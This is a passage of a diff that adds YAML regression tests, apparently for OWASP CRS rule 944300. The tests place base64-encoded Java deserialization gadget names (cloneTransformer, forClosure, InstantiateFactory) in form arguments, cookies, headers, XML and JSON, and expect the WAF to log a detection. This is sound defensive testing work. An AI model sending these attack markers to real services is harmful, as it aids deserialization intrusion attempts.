\"GNsb25ldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-88 + desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-89 + desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-90 + desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-91 + desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-92 + desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BjbG9uZXRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-93 + desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-94 + desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-95 + desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-96 + desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-97 + desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-98 + desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-99 + desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-100 + desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-101 + desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-102 + desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Zm9yY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-103 + desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Zm9yY2xvc3VyZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-104 + desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Zm9yY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-105 + desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-106 + desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-107 + desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-108 + desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-109 + desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-110 + desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-111 + desc: "Argument test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-112 + desc: "Argument name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-113 + desc: "Cookie test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GZvcmNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-114 + desc: "Cookie name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GZvcmNsb3N1cmU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-115 + desc: "Request header test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GZvcmNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-116 + desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-117 + desc: "XML element value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-118 + desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-119 + desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-120 + desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"GZvcmNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-121 + desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"GZvcmNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-122 + desc: "Argument test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-123 + desc: "Argument name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-124 + desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bmb3JjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-125 + desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bmb3JjbG9zdXJl=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-126 + desc: "Request header test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bmb3JjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-127 + desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-128 + desc: "XML element value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-129 + desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-130 + desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-131 + desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-132 + desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-133 + desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-134 + desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-135 + desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-136 + desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-137 + desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-138 + desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 